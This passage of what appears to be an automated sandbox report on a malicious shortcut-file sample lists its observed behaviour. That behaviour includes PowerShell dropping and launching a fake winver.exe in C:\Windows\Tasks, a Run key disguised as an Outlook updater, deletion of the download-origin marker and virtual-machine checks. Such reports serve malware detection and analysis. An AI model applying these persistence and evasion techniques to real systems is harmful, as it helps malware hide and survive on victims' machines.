Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C7361 push edx; ret	1_2_00007FFD9B8C7362
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8CA381 push edx; ret	1_2_00007FFD9B8CA382
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C5381 push edx; ret	1_2_00007FFD9B8C5382
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C6381 push edx; ret	1_2_00007FFD9B8C6382
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C87B9 push edx; ret	1_2_00007FFD9B8C87FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C13A5 push edx; ret	1_2_00007FFD9B8C13AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C9BC1 push edx; ret	1_2_00007FFD9B8C9BC2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C86F5 push edx; ret	1_2_00007FFD9B8C8732
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C7AE5 push edx; ret	1_2_00007FFD9B8C7B22
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C7EEC push edx; ret	1_2_00007FFD9B8C7F1A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C4EE9 push edx; ret	1_2_00007FFD9B8C4EEA

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Executable created and started: C:\Windows\Tasks\winver.exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Tasks\winver.exe

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Tasks\winver.exe

Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OutlookUpdater_1206996950

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Tasks\62rgx9T9MW.pdf

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OutlookUpdater_1206996950			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OutlookUpdater_1206996950			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Tasks\winver.exe

File opened: C:\Windows\Tasks\winver.exe:Zone.Identifier read attributes | delete

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D7B4BB4 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

11_2_00007FF63D7B4BB4

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\winver.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\Tasks\winver.exe	Memory allocated: 1F9F3280000 memory reserve \| memory write watch
Source: C:\Windows\Tasks\winver.exe	Memory allocated: 1F9F3530000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4750	Jump to behavior
